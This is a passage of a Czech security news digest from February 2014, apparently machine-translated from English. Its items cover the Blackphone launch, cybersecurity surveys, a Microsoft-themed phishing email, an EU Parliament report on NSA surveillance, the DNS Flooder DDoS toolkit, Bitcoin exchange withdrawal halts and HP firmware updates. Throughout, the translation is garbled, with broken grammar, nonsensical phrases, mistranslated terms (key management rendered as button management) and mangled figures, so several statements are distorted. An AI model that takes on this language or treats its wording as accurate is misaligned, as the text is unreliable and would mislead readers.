Na operačním systému od Googlu bude telefon také postaven, ovšem bude používat vlastní, bezpečnější verzi nazvanou PrivatOS. Její součástí budou aplikace pro šifrované hovory, zprávy, přenos dat i video chat. Komunikační funkce budou využívat technologií od americké společnosti Silent Circle, která je známá jako tvůrce šifrovacího programu PGP. Na vývoji se pak bude podílet i výrobce telefonů se systémy Android a Firefox OS Geeksphone.

Smartphone bude vybaven 4,7palcovým displejem, 16 GB interní pamětí, 8Mpx fotoaparátem a lepším než 2GHz procesorem.

„Telefon vznikl z potřeby chránit soukromí. Geeksphone umí vyrábět telefony, Silent Circle má zase zkušenosti s ochranou soukromí. K tomu jsme přidali pár aplikací a vylepšili ochranu Androidu proti útokům,“ řekl další ze zakladatelů Phil Zimmermann.

Zabezpečenou komunikaci lze vést dvěma způsoby – mezi dvěma telefony Blackphone nebo mezi jedním Blackphonem a jiným zařízením s aplikací od Silent Circle. Vždy je přitom vyžadován šifrovací klíč, takže se k obsahu komunikaci není možné dostat ani z vlastních serverů společnosti.

„Neříkáme vám, abyste nám věřili. Představte si například, že by naše servery padly do nesprávných rukou,“ řekl Zimmermann. I kdyby je prý získala samotná NSA, byly by jí k ničemu.

Autoři věří, že lidé budou mít o nový typ telefonu zájem. Ostatně, i díky případu Edwarda Snowdena prý Silent Circle zaznamenal zvýšený zájem o své služby. Společnost nepopírá, že se aféra příznivě podepsala na jejích tržbách.

Telefon bude prodávat jeho výrobce i mobilní operátoři. Zatím se však oficiálně ví pouze o KPN Mobile v Nizozemsku.


Smutný stav kybernetické bezpečnosti připravenosti
24.2.2014 Bezpečnost
Jen 17 procent britských podnikatelů viz kybernetickou bezpečnost jako hlavní prioritu, ve srovnání s 41 procenty v USA, výzkum z BT odhalil. výzkum, který posuzuje postoje ke kybernetické bezpečnosti a úrovně připravenosti mezi IT s rozhodovací pravomocí, zdůrazňuje že britské podniky zaostávají za svými protějšky v USA v klíčových oblastech. Jen jeden z pěti (21 procent) respondentů ve Velké Británii jsou schopny měřit návratnost investic do jejich počítačové bezpečnostních opatření ve srovnání s devíti z deseti (90 procent) společností v USA. Podobně 86 procent amerických ředitelů a vedoucích s rozhodovací pravomocí jsou uvedeny zabezpečení IT školení ve srovnání s pouze 37 procent ve Velké Británii.

Respondenti, že věří, postoj jejich generálního ředitele k kybernetické bezpečnosti je "ochrana proti kybernetickému útoku je absolutní prioritou" podle zemí (BASE: všichni respondenti) Více než polovina (58 procent), kteří rozhodují IT celosvětově uvedl, že jejich desky podceňují význam o kybernetické bezpečnosti. Tento údaj se zvyšuje na 74 procent v USA, ale klesne na 55 procent ve Velké Británii. rozdíl v úrovni připravenosti koreluje s postoji k hrozbám. Non-škodlivé zasvěcených hrozby (např. náhodné ztrátě dat), jsou v současné době nejčastěji citovaný bezpečnostním problémem na celém světě byla hlášena jako vážná hrozba o 65 procent tvůrců IT rozhodování. Ve Velké Británii to klesne na 60 procent a následně se zlými úmysly zasvěcených hrozbami (51 procent), hacktivism (37 procent), organizovaný zločin (32 procent), národních států (15 procent) a terorismus (12 procent) . Ve Spojených státech je podíl osob s rozhodovací pravomocí IT, kteří vidí non-škodlivé zasvěcených hrozby jako vážnou hrozbu zvyšuje na 85 procent a následně se zlými úmysly zasvěcených hrozbami (79 procent), hacktivism (77 procent), organizovaný zločin (75 procent), terorismus (72 procent) a národní státy (70 procent). Do budoucna, více než polovina světových tvůrců rozhodnutí, které se domnívají, že hacktivism (54 procent) a škodlivý zasvěcených hrozby (53 procent), budou představovat větší riziko v průběhu příštích 12 měsíců. V USA se zvýší na 73 procent a 74 procent, resp. Pro srovnání, 29 procent a 23 procent ve Velké Británii. Globálně, terorismus je vnímán jako hrozba nejméně pravděpodobné, že představují větší riziko v průběhu příštích 12 měsíců. Cyber ​​bezpečnostní hrozby, které představují riziko nyní a které představují větší riziko, v příštím roce (Base: Všichni respondenti) Mark Hughes, výkonný ředitel společnosti BT bezpečnosti, řekl: "Tento výzkum poskytuje fascinující pohled na měnící se hrozeb a výzvu To představuje pro organizace po celém světě. Masivní expanze vlastnictví zaměstnanců zařízení, cloud computing a extranety, se násobí riziko zneužívání a útoku, takže organizace vystavené nesčetných vnitřních a vnějších hrozeb -. Škodlivých a náhodných "Americké firmy by měl být slaven za uvedení kybernetické bezpečnosti na přední noha. Rizika pro podnikání se pohybují příliš rychle, čistě reaktivní zabezpečení přístupu, aby byla úspěšná. Stejně tak by se kybernetické bezpečnosti být viděn jako problém pro IT oddělení sám. " V reakci na nové hrozby, tři čtvrtiny (75 procent), tvůrců IT rozhodování na celém světě říkají, že by chtěli přepracovat svou infrastrukturu a navrhnout jim s bezpečnostními prvky z zem se. 74 procent by chtěl trénovat všechny zaměstnance v počítačové bezpečnosti osvědčených postupů. Podobně, jen něco málo přes polovinu (54 procent) uvedla, že by se chtěli zapojit externí dodavatele pro monitorování systému a zabránit útokům. Hughes dodal: "Vzhledem k tomu, hrozeb se neustále vyvíjí, generální ředitelé a vedoucí pracovníci na úrovni desky je třeba investovat do kybernetické bezpečnosti a vzdělávat své lidi v IT oddělení i mimo něj. V sázce je příliš vysoká pro kybernetickou bezpečnost, aby se tlačil na dně hromady.


Neskutečná Microsoft "aktivovat e-mailového účtu", e-maily, dělá kola
24.2.2014 Phishing
Phishingové e-maily údajně poslal Microsoft se zaměřují na zákazníky, společnosti a snaží se je přimět, aby odhalit své přihlašovací údaje a některé osobní informace. vzhledem k záminkou, že je třeba, aby reaktivní svůj e-mailový účet. "V souladu s aktualizací pokynů na e-mail od společnosti Microsoft Corporation a WWW hostitel poštovní doména, všechny neověřené e-mailové účty by se pozastavuje pro ověření, "e-mailové pohledávek. "Aby nedošlo k pozastavení vašeho e-mailového účtu a také zachovat všechny e-mailové obsah, proveďte jeden čas automatické ověření vyplněním on-line formuláře ověřování." "Prosím, přesunout zprávu do složky Doručená pošta, je-li nalezen v hromadném adresáři. Prosím tě, to pro všechny vaše e-mailové účty, "že phishery přidány v naději na získání více než jednu sadu pověření e-mailového účtu, pak podepsal e-mail s" WWW. mailovou podpůrný tým "," Microsoft Corporation ". Příjemci, kteří následují vložený odkaz, jsou prezentovány s on-line formulář, který od nich vyžaduje zadat svou e-mailovou adresu, heslo, datum narození a telefonní číslo. "Po předání těchto informací, jsou uživatelé automaticky přesměrováni pryč z webových stránek podvod. Mezitím, mohou podvodníci využít data, která mají ukradené na přístup k ohrožena e-mailové účty a používat je, aby zahájily další spam a podvodné kampaně, " vysvětluje Hoax-Slayer. "Vzhledem k tomu, podvod e-maily jsou odesílány prostřednictvím unesených účtů obětí, e-maily nelze vystopovat zpět do zločinců zodpovědných."


NSA snooping: návrhy EP tabulky na ochranu soukromí občanů EU
24.2.2014 Špionáž
Evropský parlament by měl odepřít svůj souhlas k obchodní dohodě mezi EU a USA, pokud plně respektuje datový soukromí občanů EU, říká zpráva poptávku na NSA a členské státy EU sledování občanů EU, schválen Výborem pro občanské svobody ve středu. Dodává, že pravidla pro ochranu údajů by měly být vyloučeny z obchodních jednání a sjednat samostatně s USA.

Text, schválil 33 hlasy pro, 7 členů se zdrželo hlasování s 17, odsuzuje "rozsáhlé, systematické, plošné shromažďování osobních údajů o nevinných lidí, často zahrnující intimní osobní údaje" a dodal, že "boj proti terorismu nemůže být nikdy důvodem pro necílené , tajné nebo dokonce nelegálních programů hmotnost dozoru ". "Nyní máme komplexní text, který poprvé spojuje in-hloubkové doporučení týkající se tvrzení Edwarda Snowdena ze dne NSA špionáže a akční plán pro budoucnost. Zpráva Výbor pro občanské svobody přišel na rozhodující čas, spolu s obviněními Snowdena a nařízení EU o ochraně údajů. Doufám, že tento dokument bude podpořena plnou parlamentu a Rady, že bude trvat déle než do příštího mandátu Evropského parlamentu ", řekl zpravodaj Claude Moraes (S & D, UK ), po hlasování. musí být zajištěna ochrana údajů vyloučeny z obchodních jednání souhlas Parlamentu k závěrečné transatlantického obchodu a investic partnerství (TTIP) dohodu s USA "by mohl být ohrožen, pokud činnosti deka hmotnost dozoru a odposlech komunikace v institucích EU a diplomatická zastoupení, nejsou zcela zastavena a adekvátní řešení pro práva na ochranu osobních údajů občanů EU, včetně správní a soudní nápravy nebyl nalezen ", poslanci říkají. Evropský parlament by proto měl odepřít svůj souhlas s dohodou o TTIP, pokud plně respektuje základní práva zakotvená v Charta EU, text doplňuje, zdůrazňuje, že ochrana údajů by měla být vyloučena z obchodních jednání. Poslanci vyzývají k "okamžitému pozastavení" zásad bezpečného přístavu ochrany osobních údajů (dobrovolné normy pro ochranu údajů pro firmy ze zemí mimo EU se převádějí občanů EU "osobní údaje do USA). Tyto zásady "neposkytují dostatečnou ochranu pro občany EU," tvrdí poslanci, které přiměly USA, aby navrhla nová pravidla pro předávání osobních údajů, které splňují požadavky EU na ochranu údajů. Programu sledování financování terorismu (TFTP) dohoda by měla být pozastavena, dokud tvrzení, že USA orgány mají přístup do bankovních údajů občanů EU mimo dohody jsou objasněny, říkají poslanci. Rámec ochrany údajů dohoda mezi EU a USA, aby byl udeřen na jaře roku 2014, musí zajistit řádné soudní nápravy pro občany EU, jejichž osobní údaje jsou předávány do USA, oni přidají. Digitální "novou dohodu" EU potřebuje "digitální novou dohodu", na být doručeny do společného úsilí institucí EU, členských států, výzkumnými institucemi, průmyslem a občanskou společností, tvrdí poslanci s tím, že některé telecoms firmy jasně zanedbané bezpečnosti IT a jejich uživatelů a klientů. Poslanci rovněž naléhá na členské státy, aby urychlily práci o návrhu reformy právních předpisů na ochranu dat v EU tak, aby mohl být schválen do konce letošního roku. Důvěra v USA cloud computing a cloud poskytovatelů byl poškozen praktikami dozoru, poslanci na vědomí. Navrhují, že Evropa by měla rozvíjet své vlastní mraky a IT řešení s cílem zajistit vysokou úroveň ochrany osobních údajů. Berou na vědomí, že do roku 2016, cloud trhu je pravděpodobné, že by stálo za 207000000000dolarů ročně dvojnásobek 2.012 value. informátor EU a ochrana nosičů programu Usnesení vyzývá Evropskou komisi, aby prověřila, zda budoucí právní předpisy EU o zřízení "evropského program na ochranu informátor "by měl zahrnovat i další oblasti pravomocí EU", se zvláštním důrazem na složitosti whistleblowing v oblasti inteligence ". Členské státy EU jsou rovněž požádáni, aby zvážili udělení informátorů mezinárodní ochranu, stíhání. Poslanci také citují zadržení ve Velké Británii Davida Miranda a zabavení materiálu v jeho vlastnictví podle zákona Spojeného království terorismu a jeho požadavku, aby Guardian noviny předání nebo zničení takového materiálu. Vidí tyto akty jako "možný vážný zásah do práva na svobodu projevu a svobodu sdělovacích prostředků", jak bylo uznáno Evropskou úmluvou o lidských právech a Listiny základních práv EU. Země EU by měly kontrolovat své vlastní tajné služby, Velká Británie, Francie, Německo, Švédsko, Nizozemsko a Polsko by mělo objasnit tvrzení o hromadný dozor - včetně případných dohod mezi zpravodajskými službami a telekomunikačních firem na přístup k výměně osobních údajů a přístup k transatlantických kabelů - a jejich soulad s právními předpisy EU, říká. Ostatní země EU , zejména těch, které se podílejí na "9-oči" (Velká Británie, Dánsko, Francie a Nizozemsko) a "14-oči" opatření (tyto země a Německo, Belgie, Itálie, Španělsko a Švédsko) se rovněž vyzývají, aby přezkoumaly své vnitrostátní zákony a postupy, kterými se řídí činnost zpravodajských služeb, aby bylo zajištěno, že jsou předmětem parlamentní a soudní dohled a veřejné kontrole a že jsou v souladu se závazky v oblasti základních práv. Poslanci považují za dvoustranné dohody, "anti-špionážní" uzavřené nebo v rámci jednání mezi některými zemí EU (Velká Británie, Francie a Německo) a USA je "kontraproduktivní a irelevantní, vzhledem k potřebě evropského přístupu k tomuto problému".


Nová globální partnerství pro boj proti počítačové kriminalitě
24.2.2014 Kriminalita
Microsoft oznámil tři nové globální partnerství s Organizací amerických států, Europolu a FIS na zvýšení spolupráce mezi mezinárodním vymáhání práva a soukromého sektoru v boji proti počítačové trestné činnosti a pomoc při budování bezpečnějšího internetu.

Microsoft úředníci podepsali memoranda o porozumění s představiteli všech tří organizací v průběhu prvního ročníku Počítačová kriminalita prosazování summitu společnosti, která svedla dohromady více než 60 představitelů a odborníků z oblasti vymáhání práva, akademické obce a soukromého sektoru pro sdílení právních a technických řešení, čelit celosvětové šíření o počítačové trestné činnosti. Konference navazuje na otevření loni na podzim z Microsoft kyberkriminalitě Center, state-of-the-art zařízení určené speciálně pro pokrok v celosvětovém boji proti počítačové kriminalitě. Tyto dohody stanoví rámec pro spolupráci a jsou určeny k zintenzivnění spolupráce a pomoci Microsoft pracují s každý ze tří organizací, k výkonu trestní podniky zabývající se počítačovou kriminalitou. Microsoft, OAS, Europol a FIS předpokládat, že spolupráce jim umožní posílit jejich soudní a technickou analýzu malware a botnetů, hodnocení a zkoumání vznikajících malware hrozby; vynucovací opatření proti zločinci,., A konečný demontáž těchto zločinných spolčení " Počítačoví zločinci jsou stále více sofistikovanější v lovení na spotřebitele, včetně dětí a starších občanů, "řekl Brad Smith, Microsoft výkonný viceprezident a generální rada. "Tyto dohody budou pomáhat soukromým a veřejným sektorem v boji proti počítačové trestné činnosti efektivněji, a zároveň chránit soukromí našich zákazníků." Microsoft je nadšený označit jeho první spolupráci s Organizací amerických států. OAS byla založena zčásti na posílení spolupráce mezi jejími členskými státy, která v současné době zahrnuje všech 34 nezávislých států Ameriky. OAS je odhodlána rozvíjet kulturu kybernetické bezpečnosti tím, že účinné a preventivní opatření k předvídání, adresu a reagovat na kybernetickým útokům. "Neexistují žádné hranice, pokud jde o počítačové trestné činnosti a zločinci jsou umístěny po celém světě, takže je nemožné, aby někdo organizace v boji proti počítačové kriminalitě sám, "řekl OAS velvyslanec Adam Blackwell. "Musíme využít sílu partnerství mít větší vliv proti těmto zločincům a udržet internet bezpečnější pro všechny." Microsoft často spolupracuje s orgány činnými v trestním organizacemi. Jedním z příkladů je nedávná spolupráce s Europolem, aby se úspěšně narušit nebezpečné ZeroAccess botnet, který infikovaný až 2 miliony počítačů a ukradl miliony dolarů z on-line inzerentů. Europol, který se může pochlubit svou vlastní Evropská Počítačová kriminalita Centre (EC3) se sídlem v centrále Europolu v Haagu, Nizozemsko, podporuje celou řadu významných počítačové kriminality operace zahrnující škodlivého softwaru a online zneužívání dětí. Dnešní dohoda se zpevní závazek Europolu nadále poskytovat cílené a účinné přístupy k boji proti počítačové trestné činnosti v Evropě. "ZeroAccess narušení botnet demonstroval sílu našich společných snah, jak náš koordinovaný přístup nuceni se zločinci v tomto případě odejít od svého zločinného podniku," řekl Zástupce ředitele Troels Oerting Europolu, který má na starosti EC3. "Tento druh spolupráce je nový model potřeboval k útoku proti počítačové trestné činnosti, a to je důvod, proč jsme odhodláni spolupracovat s Microsoftem, takže můžeme mít více agresivní akce v budoucnu." Finanční zločiny, zejména představovat vážnou hrozbu kybernetické. Jako největší světový poskytovatel finančních technologií, FIS je v přední linii boje udržet kybernetické bezpečnosti plateb a finančních transakcí po celém světě. Podpisem tohoto memoranda o porozumění, FIS je další krok na účet svých klientů finančních institucí, které pomáhají chránit je proti počítačové trestné činnosti. "Toto partnerství se společností Microsoft vám pomůže FIS lépe chránit své zákazníky před počítačovou kriminalitou a aby globální finanční transakce bezpečnější pro naše klienty a jejich Zákazníci, "řekl Greg Montana, EVP a ředitel pro řízení rizik, FIS. "Jsme potěšeni, že ve spolupráci s firmami jako Microsoft, které užíváte agresivní kroky k řešení počítačové kriminalitě při každé příležitosti. Těšíme se na dlouhodobou a oboustranně prospěšného vztahu se společností Microsoft."


Obavy o bezpečnost brzdí konsolidaci datových center
22.2.2014 Bezpečnost
Bezpečnostní obavy brání podnikům z odemykání potenciální přínosy konsolidace datových center a cloud služeb, podle SafeNet.

Výzkum, který je založen na globálním průzkumu cca 600 bezpečnosti a manažery IT, zjistil, že zatímco téměř tři čtvrtiny odborníků v oblasti IT zobrazení konsolidace datového centra jako důležité (75 procent EMEA, 73 procent Noram, 63 procent APAC), více než polovina (51 procent) nemají konsolidační plány v místě (46 procent EMEA, 49 procent NORAM, 71 procent APAC)., a pouze čtvrtina dokončení konsolidační projekty Výsledky průzkumu ukazují, že bezpečnostní problémy, pokud jde o adresování šifrování a klíčových potřeb v oblasti řízení , mohou být faktory přispívající ke zpomalení pokroku v úsilí o konsolidaci, včetně pohybující se zátěží od fyzických strojů do virtualizovaných systémů. Konkrétně, na ty, kdo konsolidace datového centra tak důležité, 62 procent uvedlo, že jejich největší starostí bylo, že ztratí kontrolu kryptografických klíčů (68 procent EMEA, 65 procent NORAM, 59 procent APAC). Tento sentiment naznačuje, že silné šifrování a bezpečnou správu klíčů jsou rozhodujícími předpoklady pro konsolidaci datových center a cloud migraci. Ve skutečnosti, pouze jedna pětina (21 procent) respondentů uvedlo, že jsou v současné době dělá jakékoliv šifrování ve svých virtuálních prostředí (23 procent EMEA, 22 procent NORAM, 16 procent APAC). Stejně jako šifrování a správu šifrovacích klíčů technicky náročné pro IT profesionály, tyto výsledky průzkumu také vyplývá, že podniky nemají požadované úrovně personální v místě na podporu konsolidace projektu. Téměř 60 procent respondentů uvedlo, že mají méně než pět lidí zapojených v řízení šifrování na celém světě. Navíc, téměř jedna třetina (27,5 procent) uvedlo, že více než 10 obchodních aplikací, které vyžadovaly šifrování. "přijetí nových technologií-takové jako velké dat, mobilita a cloud-based služeb, se tlačil konsolidace datového centra na horní části seznamu priorit pro mnoho firem. Přesto je zřejmé, že obavy o bezpečnost v kombinaci s nedostatkem zdrojů narušuje průběh takových transformací, "uvedl Prakash Panjwani, senior viceprezident a generální manažer, SafeNet. "Každý posun do infrastruktury může být skličující pro IT profesionály, ale s daty nyní uložen přes hybridní IT krajiny, včetně on-prostor, na mobilních zařízeních, a v cloud-bezpečnostních týmů provede odklon od tradičních přístupů a přijmout nové šifrovací technologie, které podporují dnešní dynamická datová centra a poskytovatele služeb prostředí, "pan . Panjwani pokračoval Hledáte konkrétně v běžných bezpečnostních procesů pro správu šifrovacích klíčů, výzkum ukázal, že:

Téměř tři čtvrtiny (74 procent) mají alespoň několik šifrovacích klíčů v softwaru (74 procent EMEA, 76 procent Noram, 69 procent APAC) - nechat otevřené dveře pro útočníky.
Méně než jeden z deseti (8,3 procenta) zabezpečit své klíče pouze v hardwaru (8 procent EMEA, 7 procent Noram, 14 procent APAC).
Jen za jedna pětina (18 procent), nevěděl, kde byly jejich klíče uloženy (17 procent EMEA, 16 procent NORAM, 17 procent APAC).
Méně než polovina respondentů (45,6 procenta), správu šifrovacích klíčů centrálně (41 procent EMEA, 43 procent NORAM, 45 procent APAC). To vytváří půdu pro neúčinnosti, překrývání úsilí, vymáhání nekonzistentní politiky a obtíže při auditu.


Microsoft představuje Multifaktorová autentizace pro všechny společnosti 365 uživatelů
22.2.2014 Bezpečnost
V chvályhodné pohybu, Microsoft rozšířil možnost ověřování multifaktoriální pro všechny uživatele sady Office 365, svého oblíbeného bázi předplatného online kancelářský software suite. "Dnes budeme přidávat Multi-faktor autentizace pro Office 365 pro služby Office 365 pro středně velké firmy, podniku plány , Akademické plány, Neziskové plány, a samostatné společnosti 365 plány, včetně systému Exchange Online a SharePoint Online, " oznámil Paul Andrew, technický produktový manažer pro Office 365.

"S Multi-faktor autentizace pro služby Office 365, jsou uživatelé povinni přiznat telefonát, textovou zprávu nebo oznámení o aplikaci na svém smartphonu po správném zadání svého hesla. Teprve poté, co byla splněna tato druhá ověřování faktor může uživatel přihlásit, "vysvětlil. Office 365 mohou administrátoři vynutit svým uživatelům používat ověřování multi-faktor velmi snadno. Poté, co jsou zapsáni, budou muset nakonfigurovat svůj druhý faktor autentizace na svém příštím přihlášení. Microsoft také má rovněž v úmyslu zavést App hesla Office desktopových aplikací, dodatečně chránit Office klienta (desktop) aplikace s 16-znaku náhodně generované heslo. "Plánujeme přidat nativní ověřování multi-faktor pro aplikace, jako je Outlook, Lync, Word, Excel, PowerPoint, PowerShell, a OneDrive pro podnikání, s datem vydání je plánováno na později v roce 2014," také přidal se. "Tato aktualizace obsahuje aktuální ověřování multi-faktor telefon-založené, a přidává schopnost integrovat jiné formy ověřování, jako jsou:. multi-faktor autentizace řešení třetích stran a čipových karet Podpora čipových karet se plánuje zahrnout US Department of Defense (DoD) Common Access Card (CAC) a US Federal Osobní Ověření identity card (PIV), mezi ostatními.


 


DDoS útok nástrojů zjednodušuje spuštění velkých reflexe útoků
22.2.2014 Počítačový útok
Prolexic Technologies vydala vysoké pohotovosti DDoS útok hrozeb poradenství na DNS Flooder v1.1 toolkit. Toolkit umožňuje rychlejší a jednodušší pro zlomyslné herci zahájit ochromující reflexe útoků a bude pravděpodobně široce přijata na trhu DDoS-as-a-Service, případně zvýšení počtu útoků.

Tato nová sada nástrojů umožňuje škodlivé činitele na nákup, nastavit a používat své vlastní DNS servery, aby zahájily odraz útoky bez nutnosti najít otevřené a zranitelné DNS servery na internetu. To urychluje dostupnost DNS botnet, což škodlivé činitele, aby zahájily rozsáhlé kybernetické útoky, aniž by museli trávit značné množství času a zdrojů, budování armády botů přes malware infekce. "Jako DNS Flooder toolkit používá odraz a zesílení techniky, mohou útočníci anonymně spustit výkonné DDoS útoky s jen několik serverů, "řekl Stuart Scholly, prezident Prolexic. "Široké využití na trhu DDoS-as-a-Service je pravděpodobné a bezpečnostní komunita si musí být vědom a pozorně sleduje vznikající hrozby." Prolexic zaznamenala DNS Flooder toolkitu v několika DDoS útok kampaní proti své globální základnu klienta přes Posledních šest měsíců. V některých případech, kampaně měli zesílení faktory 50 násobku šířky pásma původu. DNS Flooder toolkit používá proces multi-krok zahájit DDoS útoky:

Toolkit spoofs IP adresu zamýšleného cíle a vytvoří žádost o DNS, který je zaslán na útočníkův DNS botnet.
Útočníka DNS botnet vysílá rozšířený DNS (EDNS) odpověď zpět. Reakce EDNS obsahuje více dat, než žádost o DNS (zesílení). Vzhledem k tomu, IP adresa, v žádosti bylo falešné, odpověď se odrazí zpět k cíli útočníka.
Toolkit smyčky vícekrát, což odráží a zesiluje odpověď na cíl po každém cyklu.


Použití šifrování stále roste
22.2.2014 Šifrování
Použití šifrování i nadále růst v reakci na obavy spotřebitelů, předpisy ochrany osobních údajů shodě a na-děje kybernetickým útokům, a přesto stále existují velké problémy v provádění šifrování dat politiky, podle studie Ponemon Institute.

Klíčová zjištění:
Stálý nárůst v nasazení šifrování s 35% organizací s podnikovou široký šifrování strategii
Většina organizací nasadit šifrování pro zmírnění dopadu narušení dat
Číslo jedna vnímaná hrozba k citlivým údajům je zaměstnanec chyby a nikoli útokem zvenčí
Dva největší výzvy, kterým čelí organizace, které vykonávají šifrování dat politiky se neví, kde citlivá data uložena a řízení skutečnou technologii
Správa klíčů identifikován jako hlavní problém více než polovina organizací
Organizace s nejvyšším bezpečnostním pozici jsou nyní třikrát větší pravděpodobnost, že mají formální strategii šifrování než ty s nejnižším bezpečnostní pozici.
Výsledky studie ukazují, že byl trvalý růst v nasazení šifrovacích řešení používaných organizacemi za posledních devět let, s 35% organizací má nyní šifrovací strategie důsledně uplatňována v celém podniku ve srovnání s 29% v loňském roce. Průzkum také ukázal, že pouze 14% dotazovaných organizací nemají šifrování strategie ve srovnání s 22% v loňském roce. Poprvé primární ovladač pro nasazení šifrování ve většině organizací je snížit dopad narušení dat, zatímco v předchozích letech Hlavním problémem bylo chránit značku nebo pověst organizace. Z těch organizací, které se domnívají, že mají povinnost zveřejňovat údaje porušování téměř polovina domnívat, že šifrování dat zajišťuje jejich bezpečný přístav, který nevyžaduje nutnost zveřejnit, že došlo skutečně k porušení. Nejrychleji rostoucí důvod, proč organizace nasazování šifrování je, aby bylo zajištěno, že splní své závazky na soukromí svých zákazníků se na zájmy svých zákazníků 42% organizací se zaměřuje spíše než pro jejich vlastní prospěch, který se zvýšil o 5% ve srovnání s loňským rokem . Číslo jedna vnímaná hrozba pro vystavení citlivých nebo důvěrných dat zůstává zaměstnanců chyby, podle 27% respondentů. Jsou-li zaměstnanec chyby v kombinaci s náhodným systém nebo proces poruch, obavy z nechtěného vystavení převažují obavy skutečných škodlivými útoky o více než 2 TO1. Kromě toho, nucené zveřejnění spouštěné žádosti e-discovery nyní představují druhý nejvyšší vnímanou hrozbu ke ztrátě citlivých dat. Když se ptali, kde je použito šifrování, organizace zařadil záložní pásky a databází, jako nejdůležitější následuje šifrování v síti a šifrování notebooku. Cloud šifrování měla relativně nízké hodnocení ve srovnání s jinými případy použití šifrování pořadí u vrcholu 10. Dva největší výzvy, kterým čelí organizace, provádění šifrování dat politiky byly objevování, kde citlivá data skutečně bydlí, uvádí 61% respondentů, a schopnost nasazení šifrovací technologie efektivně, uvádí 50% respondentů. Správa klíčů byl identifikován jako hlavní problém s více než polovina dotazovaných organizací hodnocení celkové výzvy spojené se správou klíčů nebo certifikátů na více než 7 na stupnici od 1 do 10 (10 je nejvyšší) a 30% organizací hodnotili výzvu na 9 nebo 10. Zatímco tři čtvrtiny organizací identifikovány správu klíčů jako formální disciplíny v rámci své organizace, více než 70% z těchto organizací se nepodařilo alokovat specializované pracovníky nebo nástroje pro úkol řízení tlačítky. Standardní Key Management Interoperability Protocol (KMIP), který umožňuje organizacím nasadit centralizované systémy správy šifrovacích klíčů, které trvají více případů užití a zařízení dodavatele, již vytvořila poměrně vysokou úroveň informovanosti mezi IT a bezpečnostní odborníci v oblasti IT. KMIP je vnímán být rostoucí význam a očekává se, že přispěje k šifrování a klíčových strategií řízení specificky kolem mraků, skladování a šifrování na úrovni aplikace. Více než polovina dotázaných uvedla, že standardní KMIP bylo důležité v cloudu šifrování ve srovnání s 42% v loňském roce. Technické bezpečnostní moduly (HSM), jsou stále považovány za důležitou součást klíčové strategie řízení. . Tato zařízení se používají k ochraně kritické zpracování údajů a klíče vysoké hodnoty a mohou být použity pro silně prosazovat bezpečnostní politikách a řízení přístupu Richard Formy, viceprezident pro strategii v Thales e-Security říká: "I když klíč řízení může být vznikající jako bariéra k šifrování nasazení, to není nový problém. Problémy spojené se správou klíčů již byly řešeny v silně regulovaných odvětvích, jako je zpracování plateb, kde se osvědčené postupy jsou dobře osvědčený a snadno se může převést do různých jiných vertikál. S více než 40 let zkušeností poskytuje klíčové řešení pro správu. Thales je ideálně umístěn na pomoc organizacím znovu posoudit a přehodnotit jejich bezpečnostní šifrovací klíč a správu infrastruktury a dodávat řešení, která zajistí jejich integritu a důvěryhodnost. " Více než 4.800 podnikání a IT manažeři byly zjišťovány v USA, Velké Británii, Německu, Francii , Austrálie, Japonsko, Brazílie a poprvé v letošním roce Rusko, zkoumat globální šifrování trendy a regionální rozdíly v použití šifrování. Výsledky z Ruské průzkumu ukázaly, přijetí šifrování v regionu je velmi hodně v souladu se zbytkem zkoumaných zemí.


Hit s DoS, několik výměn Bitcoin pozastavit výběry
22.2.2014 Bezpečnost
Jako populární Bitcoin výměny nadále bombardováni s chybně transakcí, mnoho z nich se rozhodlo dočasně zabránit svým zákazníkům stáhnout své finanční prostředky. Problém, zpočátku myslel být omezena pouze k výměně Japonsko založené na Mt. GOX, leží v vady postihující Bitcoin peněženky, ale ne Bitcoin kniha. Jako několik dalších výměn - nejvíce prominentně Bitstamp a BTC - také zastavit nebo zpoždění výběry, dokud není problém vyřešen, kurz Bitcoin vzal ostrý skok. The Bitcoin Nadace se přestěhoval do uklidnit uživatele a vysvětlit situaci:

Někdo (nebo několik somebodies) se využívají vydání transakce tvárnost a předávání zmutované verze transakcí. Toto je odhalení chyby jak v referenční implementace a software Některé burzy. My (jádro dev team, vývojáři na burzách, a dokonce i velkých těžebních bazény) vytváření zástupná řešení a opravy právě teď. To je útok typu denial-of-service, kdo je na tom to není krádež mince, ale daří v prevenci některé transakce z potvrzení. Je důležité si uvědomit, že DoS útoky nemají vliv na Bitcoin peněženky nebo prostředky lidí. Uživatelé referenční implementace, které jsou pokousal této chybě může vidět jejich bitcoins "svázaná" v nepotvrzených transakcí, musíme aktualizovat software stanovit, že chyba, takže když upgradu ty mince jsou vráceny do peněženky, a jsou k dispozici opět utrácet. Pouze uživatelé, kteří dělají více transakcí v krátké době bude ovlivněn. Výsledkem je, že výměny jsou o dočasném pozastavení výběry na ochranu finančních prostředků zákazníků a zabránit finanční prostředky od bytí nemístné.

Mt. GOX také oznámila , že spolupracuje s vývojovým týmem Bitcoin na řešení. Dosud není známo, kdo za útoky stojí, ale je rozumné věřit, že útoky jsou koordinovány a že konečným cílem útočníků bylo dočasně přinést cena Bitcoin dolů, aby bylo možné na trhu spekulace. Nebylo by to poprvé, kdy DDoS útoky jsou používány k ovlivňování finančních trhů.


HP uvádí bezpečnosti a zabezpečení serveru aktualizace bude i nadále zdarma
22.2.2014 Bezpečnost
Zprávy , které začíná 19. února, bude HP poskytovat aktualizace firmwaru pro své servery pouze pro zákazníky s platnou zárukou, Care Pack nebo smlouvy o poskytování podpory, která zasáhla jako domečky z karet těm, kteří nemají a nemají v úmyslu platit pro službu. "Toto rozhodnutí posiluje náš cíl poskytnout přístup k nejnovějším firmware HP, která je cenným duševním vlastnictvím, pro naše zákazníky, kteří si zvolili maximalizovat a chránit jejich investice do IT.," vysvětlila Marie McCoy, VP pro podporu serveru. "Víme, že je to změna od toho, jak jsme udělali podnikání v minulosti. To však vyrovnává s průmyslovými osvědčených postupů, a je to správné rozhodnutí pro naše zákazníky a partnery" Uživatelé, kteří nemají nebo nechtějí platit za přístup k firmware cítil kouta - jestliže kritická chyba je objevena ve firmwaru a záplatované, oni by byli nuceni pony se peníze, nebo být vystaveny zvýšenému riziku. ale McCoy vyjasnilo pár detailů v úterý, a potvrdil, že aktualizace zabezpečení a bezpečnosti bude i nadále poskytována zdarma všem uživatelům serveru. "Je to díky prodeji záruky na produkt a prodeje podpůrných služeb po záruce, že jsme schopni investovat do vytvoření velké zkušenosti zákazníků s našimi výrobky. Samozřejmě se neptejte zákazníky, aby kupovali podporu, je to jejich volba, "řekla vysvětlila . "Změní přístupová firmware jsme udělali na 19 únoru 2014 se vztahují na serverech HP 